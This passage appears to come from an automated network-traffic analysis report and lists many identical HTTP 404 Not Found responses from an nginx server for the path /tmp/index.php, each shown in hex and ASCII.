46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:28:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 